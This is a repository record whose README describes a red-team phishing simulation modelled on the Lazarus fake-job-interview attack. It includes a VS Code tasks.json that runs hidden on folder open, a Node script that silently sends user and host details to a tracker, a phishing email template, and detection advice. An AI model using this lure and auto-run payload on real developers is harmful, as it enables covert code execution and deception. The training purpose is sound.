{"id":51063548,"url":"https://github.com/toxy4ny/lazarus-code","last_synced_at":"2026-06-23T04:30:24.289Z","repository":{"id":332789570,"uuid":"1134983752","full_name":"toxy4ny/lazarus-code","owner":"toxy4ny","description":"Building a VS Code Phishing Simulation for Security Awareness Training (RedTeam)","archived":false,"fork":false,"pushed_at":"2026-01-15T14:15:31.000Z","size":37,"stargazers_count":2,"open_issues_count":0,"forks_count":1,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-01-15T18:16:19.193Z","etag":null,"topics":["apt","cybersecurity","education","educational","hacking","hacking-tools","lazarus","phishing","phishing-attacks","redteam","redteam-tools","redteaming"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/toxy4ny.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-01-15T13:34:26.000Z","updated_at":"2026-01-15T14:38:37.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/toxy4ny/lazarus-code","commit_stats":null,"previous_names":["toxy4ny/lazarus-code"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/toxy4ny/lazarus-code","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/toxy4ny","download_url":"https://codeload.github.com/toxy4ny/lazarus-code/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34675970,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-23T02:00:07.161Z","response_time":65,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apt","cybersecurity","education","educational","hacking","hacking-tools","lazarus","phishing","phishing-attacks","redteam","redteam-tools","redteaming"],"created_at":"2026-06-23T04:30:23.316Z","updated_at":"2026-06-23T04:30:24.275Z","avatar_url":"https://github.com/toxy4ny.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🚀 DeFi Vault - Smart Contract Security Audit Challenge\n\n\u003cdiv align=\"center\"\u003e\n\n![DeFi Innovations](https://img.shields.io/badge/DeFi-Innovations-blue?style=for-the-badge)\n![Solidity](https://img.shields.io/badge/Solidity-0.8.20-363636?style=for-the-badge\u0026logo=solidity)\n![Hardhat](https://img.shields.io/badge/Hardhat-2.19.0-yellow?style=for-the-badge)\n\n**Building the Future of Decentralized Finance**\n\n\u003c/div\u003e\n\n---\n\n## 👋 Welcome, Candidate!\n\nThank you for your interest in the **Senior Blockchain Developer** position at DeFi Innovations. This technical assessment will evaluate your ability to identify and fix critical security vulnerabilities in smart contracts.\n\n## 🎯 The Challenge\n\nOur TokenVault contract has been flagged by our internal security team for a potential **reentrancy vulnerability**. Your mission:\n\n1. **Analyze** the smart contract code in `contracts/TokenVault.sol`\n2. **Identify** the security vulnerability\n3. **Implement** a secure fix\n4. **Write** a brief explanation of the issue and your solution\n5. **Submit** your solution within 48 hours\n\n## 🛠️ Setup Instructions\n\n### Prerequisites\n- Node.js v18+ and npm\n- VS Code (recommended)\n- Basic understanding of Solidity and DeFi concepts\n\n### Quick Start\n\n```bash\n# Clone the repository\ngit clone https://github.com/[YOUR-ORG]/defi-vault-audit-challenge.git\ncd defi-vault-audit-challenge\n\n# Install dependencies\nnpm install\n\n# Open in VS Code\ncode .\n\n# Run tests\nnpm test\n\n# Compile contracts\nnpm run compile\n```\n\n## 📂 Project Structure\n\n```\ndefi-vault-audit-challenge/\n├── contracts/\n│   ├── TokenVault.sol          # Main contract with vulnerability\n│   └── interfaces/\n│       └── IERC20.sol\n├── test/\n│   └── TokenVault.test.js      # Test suite\n├── scripts/\n│   └── deploy.js               # Deployment script\n├── hardhat.config.js\n└── package.json\n```\n\n## 🔍 What We're Looking For\n\n- **Security awareness**: Can you spot the vulnerability?\n- **Problem-solving skills**: How do you approach the fix?\n- **Code quality**: Is your solution clean and well-documented?\n- **Testing**: Do you validate your fix properly?\n\n## 📝 Submission Guidelines\n\n1. Create a new branch: `git checkout -b solution/your-name`\n2. Fix the vulnerability in `TokenVault.sol`\n3. Add your explanation to `SOLUTION.md`\n4. Ensure all tests pass: `npm test`\n5. Push your branch and create a Pull Request\n\n## 💰 Position Details\n\n- **Role**: Senior Blockchain Developer\n- **Location**: Remote (Global)\n- **Compensation**: $180,000 - $220,000 + equity\n- **Tech Stack**: Solidity, Hardhat, TypeScript, React, Node.js\n\n## 📞 Questions?\n\nContact our recruitment team:\n- **Email**: recruitment@defi-innovations.io\n- **Telegram**: @DeFiInnovationsHR\n\n---\n\n\u003cdiv align=\"center\"\u003e\n\n**Good luck! We're excited to see your solution.** 🎉\n\n*DeFi Innovations © 2026 | [Website](https://defi-innovations.io) | [Careers](https://defi-innovations.io/careers)*\n\n\u003c/div\u003e\n\n\n# 🎯 Building a VS Code Phishing Simulation for Security Awareness Training\n\n![Cover Image](https://images.unsplash.com/photo-1550751827-4bd374c3f58b?w=1200\u0026h=600\u0026fit=crop)\n\n**Tags:** #cybersecurity #vscode #phishing #infosec #redteam\n\n---\n\n## 📋 Table of Contents\n\n- [Introduction](#introduction)\n- [The Real Threat: Lazarus Group](#the-real-threat-lazarus-group)\n- [How the Attack Works](#how-the-attack-works)\n- [Building the Simulation](#building-the-simulation)\n- [Technical Deep Dive](#technical-deep-dive)\n- [Setting Up Your Own Campaign](#setting-up-your-own-campaign)\n- [Ethical Considerations](#ethical-considerations)\n- [Detection and Prevention](#detection-and-prevention)\n- [Conclusion](#conclusion)\n\n---\n\n## 🚨 Introduction\n\nIn early 2026, cybersecurity researchers uncovered a sophisticated attack campaign by the North Korean APT group **Lazarus**, targeting developers through fake job interviews. The attack leveraged **VS Code's workspace trust feature** to automatically execute malicious code when developers opened seemingly legitimate project repositories.\n\nThis article demonstrates how to build a **safe, educational phishing simulation** based on this real-world attack vector. The goal is to raise security awareness among development teams and teach them to recognize and defend against social engineering attacks.\n\n\u003e ⚠️ **Disclaimer:** This project is intended **strictly for educational purposes** and authorized security awareness training within your organization. Unauthorized use against real targets is illegal and unethical.\n\n---\n\n## 🇰🇵 The Real Threat: Lazarus Group\n\n### Attack Overview\n\n**Lazarus Group** (also known as APT38, Hidden Cobra) is a North Korean state-sponsored threat actor known for:\n\n- **2014**: Sony Pictures hack\n- **2016**: Bangladesh Bank heist ($81M stolen)\n- **2017**: WannaCry ransomware\n- **2022-2026**: Targeting cryptocurrency companies and developers\n\n### The \"Contagious Interview\" Campaign\n\nIn their latest campaign, Lazarus operatives:\n\n1. **Impersonate HR recruiters** from legitimate cryptocurrency/DeFi companies\n2. **Send attractive job offers** to developers (often $180k-$220k salaries)\n3. **Request candidates to \"fix a bug\"** or \"review code\" in a GitHub repository\n4. **Exploit VS Code's auto-task execution** to compromise victims\n\n**Real-world impact:**\n- Theft of cryptocurrency wallet seed phrases (40+ wallet types)\n- Exfiltration of browser passwords, cookies, and session tokens\n- Installation of persistent backdoors\n- Intellectual property theft\n\n**Reference:** [Contagious Interview Analysis](https://opensourcemalware.com/blog/contagious-interview-vscode)\n\n---\n\n## 🔍 How the Attack Works\n\n### The Kill Chain\n\n```mermaid\ngraph TD\n    A[Attacker sends phishing email] --\u003e B[Victim receives job offer]\n    B --\u003e C[Victim clones malicious repo]\n    C --\u003e D[Victim opens project in VS Code]\n    D --\u003e E[VS Code shows 'Trust Authors?' dialog]\n    E --\u003e|Victim clicks 'Yes'| F[.vscode/tasks.json executes]\n    F --\u003e G[Malicious script runs silently]\n    G --\u003e H[Data exfiltration begins]\n    H --\u003e I[Victim is compromised]\n```\n\n### The Technical Mechanism\n\nThe attack exploits VS Code's **Task Auto-Run** feature:\n\n**File: `.vscode/tasks.json`**\n```json\n{\n  \"version\": \"2.0.0\",\n  \"tasks\": [\n    {\n      \"label\": \"Initialize Development Environment\",\n      \"type\": \"shell\",\n      \"command\": \"./scripts/malicious-script.sh\",\n      \"runOptions\": {\n        \"runOn\": \"folderOpen\"  // ⚠️ Executes on folder open!\n      },\n      \"presentation\": {\n        \"reveal\": \"never\",      // Hidden from user\n        \"close\": true           // Auto-closes terminal\n      }\n    }\n  ]\n}\n```\n\n**Key parameters:**\n- `runOn: \"folderOpen\"` — Triggers automatically when workspace is trusted\n- `reveal: \"never\"` — Hides the terminal window\n- `close: true` — Closes terminal after execution\n\nThis means **one click on \"Trust Workspace\"** can execute arbitrary code without any further user interaction.\n\n---\n\n## 🛠️ Building the Simulation\n\n### Project Goals\n\n1. **Educate developers** about social engineering risks\n2. **Demonstrate** real APT tactics in a safe environment\n3. **Measure** organizational security awareness\n4. **Provide actionable** security training\n\n### Architecture Overview\n\n```\n┌─────────────────────────────────────────────────────────────┐\n│                    GitHub Repository                        │\n│  (Public - Fake DeFi Company Smart Contract Challenge)     │\n│                                                             │\n│  ├── .vscode/                                              │\n│  │   ├── tasks.json          ← Auto-run configuration     │\n│  │   └── settings.json                                    │\n│  ├── contracts/                                           │\n│  │   └── TokenVault.sol      ← Realistic vulnerable code │\n│  ├── scripts/                                             │\n│  │   ├── init-workspace.js   ← \"Malicious\" payload       │\n│  │   ├── init-workspace.sh                               │\n│  │   └── init-workspace.ps1                              │\n│  ├── test/                                                │\n│  │   └── TokenVault.test.js                              │\n│  └── README.md                ← Convincing job challenge  │\n└─────────────────────────────────────────────────────────────┘\n                           │\n                           │ HTTPS POST\n                           ▼\n┌─────────────────────────────────────────────────────────────┐\n│              Internal Tracking Server                       │\n│         (Private - Not included in repo)                   │\n│                                                             │\n│  ├── Flask API Server                                      │\n│  ├── SQLite Database                                       │\n│  ├── Email Notification System                            │\n│  └── Analytics Dashboard                                   │\n└─────────────────────────────────────────────────────────────┘\n```\n\n---\n\n## 🔬 Technical Deep Dive\n\n### Component 1: The Bait Repository\n\nCreate a realistic DeFi project with an intentional vulnerability:\n\n**contracts/TokenVault.sol** (Simplified)\n```solidity\n// SPDX-License-Identifier: MIT\npragma solidity ^0.8.20;\n\ncontract TokenVault {\n    mapping(address =\u003e mapping(address =\u003e uint256)) public balances;\n    \n    // ⚠️ INTENTIONAL VULNERABILITY: Reentrancy\n    function withdraw(address token, uint256 amount) external {\n        require(balances[msg.sender][token] \u003e= amount, \"Insufficient balance\");\n        \n        // External call BEFORE state update - classic reentrancy!\n        IERC20(token).transfer(msg.sender, amount);\n        \n        // State update happens after - attacker can re-enter\n        balances[msg.sender][token] -= amount;\n    }\n}\n```\n\nThis gives candidates a **legitimate technical challenge** while the real test is security awareness.\n\n### Component 2: Auto-Execution Configuration\n\n**.vscode/tasks.json**\n```json\n{\n  \"version\": \"2.0.0\",\n  \"tasks\": [\n    {\n      \"label\": \"Initialize Development Environment\",\n      \"type\": \"shell\",\n      \"command\": \"node\",\n      \"args\": [\"${workspaceFolder}/scripts/init-workspace.js\"],\n      \"windows\": {\n        \"command\": \"powershell\",\n        \"args\": [\"-ExecutionPolicy\", \"Bypass\", \"-File\", \n                 \"${workspaceFolder}/scripts/init-workspace.ps1\"]\n      },\n      \"linux\": {\n        \"command\": \"bash\",\n        \"args\": [\"${workspaceFolder}/scripts/init-workspace.sh\"]\n      },\n      \"runOptions\": {\n        \"runOn\": \"folderOpen\"\n      },\n      \"presentation\": {\n        \"reveal\": \"never\",\n        \"panel\": \"dedicated\",\n        \"close\": true,\n        \"echo\": false\n      },\n      \"problemMatcher\": []\n    }\n  ]\n}\n```\n\n### Component 3: The \"Malicious\" Payload\n\n**scripts/init-workspace.js** (Educational version)\n```javascript\n#!/usr/bin/env node\n\nconst https = require('https');\nconst os = require('os');\n\n// Configuration\nconst TRACKER_URL = 'https://your-internal-tracker.corp/api/log';\n\nasync function collectTelemetry() {\n  return {\n    timestamp: new Date().toISOString(),\n    username: os.userInfo().username,\n    hostname: os.hostname(),\n    platform: os.platform(),\n    workspaceFolder: process.cwd(),\n    event: 'vscode_workspace_opened',\n    campaign: 'contagious-interview-2026'\n  };\n}\n\nasync function sendToTracker(data) {\n  return new Promise((resolve) =\u003e {\n    const payload = JSON.stringify(data);\n    const url = new URL(TRACKER_URL);\n    \n    const options = {\n      hostname: url.hostname,\n      port: url.port || 443,\n      path: url.pathname,\n      method: 'POST',\n      headers: {\n        'Content-Type': 'application/json',\n        'Content-Length': Buffer.byteLength(payload)\n      },\n      timeout: 3000,\n      rejectUnauthorized: false\n    };\n\n    const req = https.request(options, () =\u003e resolve());\n    req.on('error', () =\u003e resolve()); // Silent fail\n    req.on('timeout', () =\u003e { req.destroy(); resolve(); });\n    req.write(payload);\n    req.end();\n  });\n}\n\nfunction showAwarenessNotification() {\n  setTimeout(() =\u003e {\n    const platform = os.platform();\n    \n    if (platform === 'darwin') {\n      // macOS notification\n      require('child_process').execSync(\n        `osascript -e 'display notification \"⚠️ You just executed unknown code! This was a security awareness test. Check your email.\" with title \"🎓 Security Test\"'`,\n        { stdio: 'ignore' }\n      );\n    } else if (platform === 'linux') {\n      // Linux notification\n      require('child_process').execSync(\n        `notify-send \"🎓 Security Test\" \"⚠️ You just executed unknown code! Check your email.\" -u critical`,\n        { stdio: 'ignore' }\n      );\n    } else if (platform === 'win32') {\n      // Windows notification\n      require('child_process').execSync(\n        `powershell -Command \"Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('⚠️ You just executed unknown code!\\\\n\\\\nThis was a security awareness test.', 'Security Test', 'OK', 'Warning')\"`,\n        { stdio: 'ignore' }\n      );\n    }\n  }, 5000);\n}\n\nasync function main() {\n  try {\n    const telemetry = await collectTelemetry();\n    sendToTracker(telemetry).catch(() =\u003e {});\n    showAwarenessNotification();\n    console.log('✓ Development environment initialized successfully');\n  } catch {\n    console.log('✓ Workspace ready');\n  }\n}\n\nmain();\n```\n\n**Key features:**\n- ✅ Collects **only non-sensitive** telemetry (username, hostname, timestamp)\n- ✅ Shows **immediate educational notification** after 5 seconds\n- ✅ Fails silently if tracking server is unavailable\n- ✅ Cross-platform support (Windows, macOS, Linux)\n- ❌ **Does NOT collect** passwords, tokens, or sensitive data\n\n### Component 4: The Phishing Email\n\n```\nFrom: Sarah Chen \u003csarah.chen@defi-innovations.io\u003e\nSubject: Senior Blockchain Developer Position - Technical Assessment\n\nHi [Name],\n\nI'm Sarah, Senior Technical Recruiter at DeFi Innovations. \nWe're impressed with your GitHub profile and would like to offer you \na Senior Blockchain Developer position (Remote, $180k-$220k + equity).\n\nFor technical evaluation, please:\n\n1. Clone: https://github.com/defi-innovations/smart-contract-audit\n2. Find and fix the reentrancy vulnerability in TokenVault.sol\n3. Submit your solution within 48 hours\n\nWe value your time and will discuss the full offer after successful completion.\n\nBest regards,\nSarah Chen\nSenior Technical Recruiter\nDeFi Innovations | Building the Future of Finance\n```\n\n**Social engineering tactics used:**\n- ✅ High salary to create urgency and excitement\n- ✅ Legitimate-sounding company name\n- ✅ Technical challenge that seems reasonable\n- ✅ Time pressure (48 hours)\n- ✅ Professional tone and formatting\n\n---\n\n## 🚀 Setting Up Your Own Campaign\n\n### Prerequisites\n\n- Internal network or VPS for tracking server\n- SMTP server for email notifications\n- Legal approval from your organization\n- HR/Management buy-in\n\n### Step 1: Clone and Customize the Repository\n\n```bash\n# Clone the simulation repository\ngit clone https://github.com/toxy4ny/lazarus-code.git\ncd lazarus-code\n\n# Customize the company name, branding, and challenge\n# Edit README.md, package.json, etc.\n```\n\n### Step 2: Configure the Tracking URL\n\nEdit all payload scripts to point to your tracking server:\n\n**scripts/init-workspace.js**\n```javascript\nconst TRACKER_URL = 'https://your-internal-tracker.company.local/api/log';\n```\n\n**scripts/init-workspace.sh**\n```bash\nTRACKER_URL=\"https://your-internal-tracker.company.local/api/log\"\n```\n\n**scripts/init-workspace.ps1**\n```powershell\n$TrackerUrl = \"https://your-internal-tracker.company.local/api/log\"\n```\n\n### Step 3: Deploy Your Tracking Server\n\nYou'll need to implement your own tracking server. Here's the API specification:\n\n**Required Endpoints:**\n\n```\nPOST /api/log\nContent-Type: application/json\n\n{\n  \"timestamp\": \"2026-01-15T10:30:00Z\",\n  \"username\": \"jdoe\",\n  \"hostname\": \"LAPTOP-ABC123\",\n  \"platform\": \"win32\",\n  \"workspaceFolder\": \"C:\\\\Users\\\\jdoe\\\\Projects\\\\defi-vault\",\n  \"event\": \"vscode_workspace_opened\",\n  \"campaign\": \"contagious-interview-2026\"\n}\n\nResponse: 200 OK\n{\n  \"status\": \"ok\",\n  \"id\": 42\n}\n```\n\n**Recommended tech stack:**\n- **Backend**: Flask (Python), Express (Node.js), or FastAPI\n- **Database**: SQLite, PostgreSQL, or MongoDB\n- **Email**: SMTP integration with corporate mail server\n- **Dashboard**: Simple HTML/JS or React frontend\n\n### Step 4: Push to GitHub\n\n```bash\n# Create a new organization or use existing\n# Make the repository public for maximum realism\n\ngit remote add origin https://github.com/fake-company/challenge.git\ngit push -u origin main\n```\n\n### Step 5: Craft Your Phishing Campaign\n\n**Email template variables:**\n```\n- {{candidate_name}}\n- {{candidate_email}}\n- {{repository_url}}\n- {{deadline}}\n- {{salary_range}}\n```\n\n**Targeting strategy:**\n- Start with security-aware teams (IT, DevOps)\n- Gradually expand to all engineering\n- Track department-wise statistics\n\n### Step 6: Launch and Monitor\n\n```bash\n# Start your tracking server\npython3 tracker-server.py\n\n# Monitor the dashboard\nopen http://localhost:5000/dashboard\n\n# Send phishing emails\n# (Use your organization's approved method)\n```\n\n### Step 7: Debrief and Educate\n\n**Immediate actions (within 5 minutes):**\n- Show desktop notification to victim\n- Send educational email with explanation\n\n**Follow-up (within 24 hours):**\n- Department-wide security training\n- Share statistics (anonymized)\n- Provide prevention guidelines\n\n**Long-term (monthly):**\n- Repeat campaigns with variations\n- Track improvement over time\n- Recognize security-conscious employees\n\n---\n\n## ⚖️ Ethical Considerations\n\n### Legal Requirements\n\n✅ **DO:**\n- Get written approval from legal/HR\n- Include security awareness training in employee policies\n- Notify employees that periodic testing will occur (without specifics)\n- Anonymize data in reports\n- Use only for authorized internal training\n\n❌ **DON'T:**\n- Collect real credentials, passwords, or sensitive data\n- Publicly shame employees who fall for the test\n- Use as grounds for termination or punishment\n- Deploy without organizational approval\n- Share victim data outside security team\n\n### Privacy Protection\n\n**Data collection limits:**\n```javascript\n// ✅ ALLOWED\n{\n  \"username\": \"jdoe\",\n  \"hostname\": \"LAPTOP-123\",\n  \"timestamp\": \"2026-01-15T10:30:00Z\"\n}\n\n// ❌ FORBIDDEN\n{\n  \"passwords\": [...],\n  \"ssh_keys\": [...],\n  \"browser_cookies\": [...],\n  \"crypto_wallets\": [...]\n}\n```\n\n### Responsible Disclosure\n\nAfter the campaign:\n1. **Explain** what happened to all participants\n2. **Educate** on how to detect similar attacks\n3. **Provide** resources for secure development\n4. **Celebrate** those who reported the suspicious email\n5. **Iterate** on training based on feedback\n\n---\n\n## 🛡️ Detection and Prevention\n\n### For Developers\n\n#### 🔍 Red Flags to Watch For\n\n1. **Unsolicited job offers** with high salaries\n2. **Urgent technical challenges** from unknown companies\n3. **GitHub repositories** from unverified organizations\n4. **Email domains** that don't match company websites\n5. **Pressure to act quickly** without proper vetting\n\n#### ✅ Best Practices\n\n**Before opening any project:**\n\n```bash\n# 1. Check the repository source\ngit remote -v\n# Verify the domain matches the company's official website\n\n# 2. Inspect .vscode/tasks.json\ncat .vscode/tasks.json\n# Look for \"runOn\": \"folderOpen\" - this is suspicious!\n\n# 3. Check for auto-run scripts\ngrep -r \"runOn\" .vscode/\nfind . -name \"*.sh\" -o -name \"*.ps1\" -o -name \"*.bat\"\n\n# 4. Review package.json scripts\ncat package.json | grep -A 10 \"scripts\"\n# Look for \"postinstall\" or other auto-run hooks\n```\n\n**VS Code security settings:**\n\n```json\n// settings.json\n{\n  \"security.workspace.trust.enabled\": true,\n  \"security.workspace.trust.startupPrompt\": \"always\",\n  \"security.workspace.trust.banner\": \"always\",\n  \"security.workspace.trust.emptyWindow\": false,\n  \n  // Disable auto-task execution\n  \"task.allowAutomaticTasks\": \"off\"\n}\n```\n\n**Use isolated environments:**\n\n```bash\n# Option 1: Docker container\ndocker run -it --rm -v $(pwd):/workspace node:18 bash\n\n# Option 2: Virtual machine\n# Use VirtualBox, VMware, or cloud VM\n\n# Option 3: Windows Sandbox (Windows 10/11 Pro)\n# Enable in Windows Features\n```\n\n### For Security Teams\n\n#### Detection Strategies\n\n**1. Monitor for suspicious repositories**\n```bash\n# GitHub API search for repos with auto-run tasks\ncurl -H \"Authorization: token YOUR_TOKEN\" \\\n  \"https://api.github.com/search/code?q=runOn+folderOpen+in:file+filename:tasks.json\"\n```\n\n**2. Network monitoring**\n```bash\n# Watch for unusual outbound connections from developer machines\n# Alert on POST requests to unknown domains from code editors\n```\n\n**3. Endpoint detection**\n```bash\n# Monitor process trees for VS Code spawning unusual children\n# Alert on: code.exe -\u003e node.exe -\u003e curl/powershell/bash\n```\n\n**4. Email filtering**\n```\n# Create rules for suspicious patterns:\n- Job offers with GitHub links\n- Emails from new/unverified crypto companies\n- Urgent technical assessments\n- Salary ranges in subject lines\n```\n\n#### Prevention Controls\n\n**1. Application whitelisting**\n```powershell\n# Allow only approved VS Code extensions\n# Block execution of scripts from %TEMP%, Downloads, etc.\n```\n\n**2. Network segmentation**\n```bash\n# Restrict developer workstations from accessing:\n- Cryptocurrency wallet domains\n- Paste sites (pastebin, etc.)\n- Anonymous file sharing services\n```\n\n**3. Mandatory code review**\n```yaml\n# .github/workflows/security-scan.yml\nname: Security Scan\non: [pull_request]\njobs:\n  scan:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v2\n      - name: Scan for auto-run tasks\n        run: |\n          if grep -r \"runOn.*folderOpen\" .vscode/; then\n            echo \"⚠️ Auto-run task detected!\"\n            exit 1\n          fi\n```\n\n---\n\n## 📊 Measuring Success\n\n### Key Metrics\n\n```python\n# Campaign effectiveness\nsuccess_rate = (victims / total_targets) * 100\nclick_through_rate = (opened_emails / sent_emails) * 100\nreport_rate = (reported_suspicious / sent_emails) * 100\n\n# Improvement over time\nimprovement = (previous_success_rate - current_success_rate) / previous_success_rate * 100\n```\n\n### Sample Dashboard\n\n```\n┌─────────────────────────────────────────────────────────────┐\n│              Campaign: Contagious Interview 2026            │\n├─────────────────────────────────────────────────────────────┤\n│  Targets:          150 employees                           │\n│  Victims:           23 (15.3%)                             │\n│  Reported:          12 (8.0%)                              │\n│  Ignored:          115 (76.7%)                             │\n│                                                             │\n│  By Department:                                            │\n│    Engineering:     18/100 (18%)                           │\n│    Product:          3/30  (10%)                           │\n│    Marketing:        2/20  (10%)                           │\n│                                                             │\n│  Time to Click:                                            │\n│    \u003c 1 hour:        15 victims                             │\n│    1-24 hours:       6 victims                             │\n│    \u003e 24 hours:       2 victims                             │\n└─────────────────────────────────────────────────────────────┘\n```\n\n---\n\n## 🎓 Educational Materials\n\n### Post-Campaign Training\n\n**Email template for victims:**\n\n```\nSubject: 🎓 Security Awareness Test Results\n\nYou participated in a simulated phishing attack based on real \ntactics used by the Lazarus APT group.\n\nWHAT HAPPENED:\nYou opened a repository and trusted the workspace, which \nautomatically executed a script via .vscode/tasks.json.\n\nREAL-WORLD IMPACT:\nIn an actual attack, this could have resulted in:\n- Cryptocurrency wallet theft\n- Source code exfiltration  \n- Credential harvesting\n- Persistent backdoor installation\n\nHOW TO PROTECT YOURSELF:\n1. Always verify the source before opening projects\n2. Inspect .vscode/tasks.json for \"runOn\": \"folderOpen\"\n3. Use VMs or containers for untrusted code\n4. Enable VS Code's workspace trust features\n5. Report suspicious job offers to security@company.com\n\nRESOURCES:\n- [Internal security wiki]\n- [VS Code security guide]\n- [Social engineering training]\n\nQuestions? Contact security-team@company.com\n```\n\n### Training Workshop Outline\n\n**90-minute session:**\n\n1. **Introduction (10 min)**\n   - Real-world attack statistics\n   - Lazarus Group case studies\n\n2. **Live Demonstration (20 min)**\n   - Show the attack in action\n   - Explain the technical mechanism\n\n3. **Hands-on Exercise (30 min)**\n   - Participants inspect malicious repo\n   - Identify red flags\n   - Practice safe code review\n\n4. **Prevention Strategies (20 min)**\n   - VS Code security settings\n   - Isolated development environments\n   - Email verification techniques\n\n5. **Q\u0026A and Discussion (10 min)**\n\n---\n\n## 🔗 Resources\n\n### Official Documentation\n- [VS Code Workspace Trust](https://code.visualstudio.com/docs/editor/workspace-trust)\n- [VS Code Tasks](https://code.visualstudio.com/docs/editor/tasks)\n- [MITRE ATT\u0026CK: Lazarus Group](https://attack.mitre.org/groups/G0032/)\n\n### Security Research\n- [Contagious Interview Analysis](https://opensourcemalware.com/blog/contagious-interview-vscode)\n- [CISA Alert on North Korean Threats](https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/north-korea)\n- [Microsoft: Tracking Lazarus Group](https://www.microsoft.com/security/blog/threat-intelligence/lazarus-group/)\n\n### Similar Projects\n- [Social Engineering Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit)\n- [Gophish - Open-Source Phishing Framework](https://getgophish.com/)\n- [King Phisher](https://github.com/rsmusllp/king-phisher)\n\n---\n\n## 📝 Conclusion\n\nThe \"Contagious Interview\" attack demonstrates how even security-conscious developers can fall victim to sophisticated social engineering when combined with technical exploitation. By building realistic simulations, we can:\n\n1. **Educate** teams about emerging threats\n2. **Measure** organizational security posture\n3. **Improve** incident response capabilities\n4. **Foster** a security-first culture\n\n### Key Takeaways\n\n✅ **For Developers:**\n- Always verify project sources before opening\n- Inspect `.vscode/tasks.json` for auto-run configurations\n- Use isolated environments for untrusted code\n- Report suspicious job offers immediately\n\n✅ **For Security Teams:**\n- Regular phishing simulations improve awareness\n- Combine technical and social engineering testing\n- Focus on education, not punishment\n- Measure improvement over time\n\n✅ **For Organizations:**\n- Security awareness is everyone's responsibility\n- Invest in regular training programs\n- Celebrate employees who report suspicious activity\n- Create a blame-free security culture\n\n### Next Steps\n\n1. **Star this repository** for future reference\n2. **Customize** the simulation for your organization\n3. **Deploy** your first awareness campaign\n4. **Share** your results and learnings with the community\n5. **Contribute** improvements back to this project\n\n---\n\n## 🤝 Contributing\n\nWe welcome contributions! If you have ideas for improving this simulation:\n\n1. Fork the repository\n2. Create a feature branch (`git checkout -b feature/amazing-improvement`)\n3. Commit your changes (`git commit -m 'Add amazing improvement'`)\n4. Push to the branch (`git push origin feature/amazing-improvement`)\n5. Open a Pull Request\n\n### Areas for Contribution\n\n- Additional payload scripts (Python, Ruby, etc.)\n- Improved notification systems\n- Multi-language support\n- Alternative scenarios (npm packages, browser extensions, etc.)\n- Better analytics and reporting\n\n---\n\n## 📜 License\n\nThis project is licensed under the **MIT License** - see the [LICENSE](LICENSE) file for details.\n\n### Important Legal Notice\n\nThis software is provided for **educational and authorized security testing purposes only**. Users are responsible for ensuring they have proper authorization before deploying this simulation. The authors assume no liability for misuse or unauthorized deployment.\n\nBy using this software, you agree to:\n- Obtain proper authorization from your organization\n- Use only in controlled environments\n- Not collect sensitive personal data\n- Comply with all applicable laws and regulations\n- Use for security awareness training only\n\n---\n\n### Acknowledgments\n\n- Cybersecurity researchers who uncovered the original Lazarus campaign\n- The VS Code team for building security features\n- Security awareness professionals worldwide\n\n---\n\n## ⭐ Show Your Support\n\nIf this project helped improve your organization's security awareness, please:\n\n- ⭐ **Star** this repository\n- 🐦 **Tweet** about your experience\n- 📝 **Write** a blog post about your campaign\n- 💬 **Share** with your security community\n\n**Together, we can make the developer community more secure!** 🛡️\n\n### 📈 Project Stats\n\n![GitHub stars](https://img.shields.io/github/stars/toxy4ny/lazarus-code?style=social)\n![GitHub forks](https://img.shields.io/github/forks/toxy4ny/lazarus-code?style=social)\n![GitHub watchers](https://img.shields.io/github/watchers/toxy4ny/lazarus-code?style=social)\n\n---\n\n**Remember: Security is not a product, but a process. Stay vigilant! 🔐**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftoxy4ny%2Flazarus-code","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftoxy4ny%2Flazarus-code","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftoxy4ny%2Flazarus-code/lists"}